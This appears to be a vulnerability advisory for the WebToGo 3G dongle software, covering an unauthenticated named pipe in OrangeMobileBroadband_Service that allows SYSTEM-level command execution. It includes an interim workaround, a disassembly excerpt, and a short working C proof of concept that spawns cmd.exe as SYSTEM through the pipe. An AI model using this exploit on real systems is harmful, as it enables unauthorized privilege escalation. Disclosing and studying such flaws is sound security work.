|Product||WebToGo 3G Dongles|
|Type||WebToGo 3G Dongle Software - Named Pipe Arbitrary Command Execution|
A vulnerability exists within the OrangeMobileBroadband_Service which allows a low privileged user to perform arbitrary command execution in the context of SYSTEM by communicating with an unprotected named pipe.
This vulnerability can be used to perform local privilege escalation on devices which have the software installed.
The vulnerability exists due to lack of authentication and authorisation being performed on connections to the named pipe.
As an interim workaround the OrangeMobileBroadband_Service could be stopped whilst not using the 3G connectivity. However, if 3G is required then this service must be running. Therefore full remediation will require a patch by the vendor.
A software upgrade message will be promoted, however, it is does not seem possible to force a manual upgrade. Therefore it may be necessary to perform the interim workaround until a patch update is promoted.
A named pipe is exposed from the OrangeMobileBroadband_Service which does not have any security restrictions applied. The service executes by default under the context of SYSTEM user. Therefore a low privileged attacker can communicate with the named pipe to perform functionality exposed by the service.
The following named pipe is exposed from the OrangeMobileBroadband_Service:
The following additional functionality was found to be exposed by the service and could be abused by an attacker:
The following code demonstrates the services ability to spawn arbitrary executable using the ShellExecuteExW function:
.text:004079FE cmp ax, 30h .text:00407A02 jnz loc_407BF2 .text:00407A08 push offset aParam40RunSpec ; "Param 40 - Run specified .text:00407A0D call sub_40BB00 .text:00407AB4 lea eax, [esp+8E80h+Dest] .text:00407ABB mov [esp+8E80h+pExecInfo.lpFile], eax .text:00407AC2 add esp, 0Ch .text:00407AC5 mov [esp+8E74h+pExecInfo.cbSize], 3Ch .text:00407AD0 mov [esp+8E74h+pExecInfo.fMask], 40h .text:00407ADB mov [esp+8E74h+pExecInfo.hwnd], edi .text:00407AE2 mov [esp+8E74h+pExecInfo.lpVerb], edi .text:00407AE9 mov ecx, offset Dependencies .text:00407AEE lea eax, [esp+8E74h+Data] .text:00407B76 lea edx, [esp+8E74h+pExecInfo] .text:00407B7D mov esi, 1 .text:00407B82 push edx .text:00407B83 mov ; pExecInfo .text:00407B8A mov [esp+8E78h+pExecInfo.lpDirectory], edi .text:00407B91 mov [esp+8E78h+pExecInfo.nShow], esi .text:00407B98 call [esp+8E78h+pExecInfo.hInstApp], edi ds:ShellExecuteExW
The following code can be used to demonstrate a low privileged user spawning a cmd.exe shell with the SYSTEM privileges.
HANDLE hPipe; wchar_t str = L"\x34\x30|C:\\Windows\\System32\\cmd.exe|args|args|args"; hPipe = CreateFile(L"\\\\.\\pipe\\OrangeMobileBroadband_Service", GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0); DWORD dwRead = 0; WriteFile(hPipe, (LPVOID)&str, sizeof(str), &dwRead, 0);
In order to exploit this vulnerability an attacker requires a low privileged account on the system. However, this issue can be exploited remotely through the named pipe if a low privileged user account is known for the system.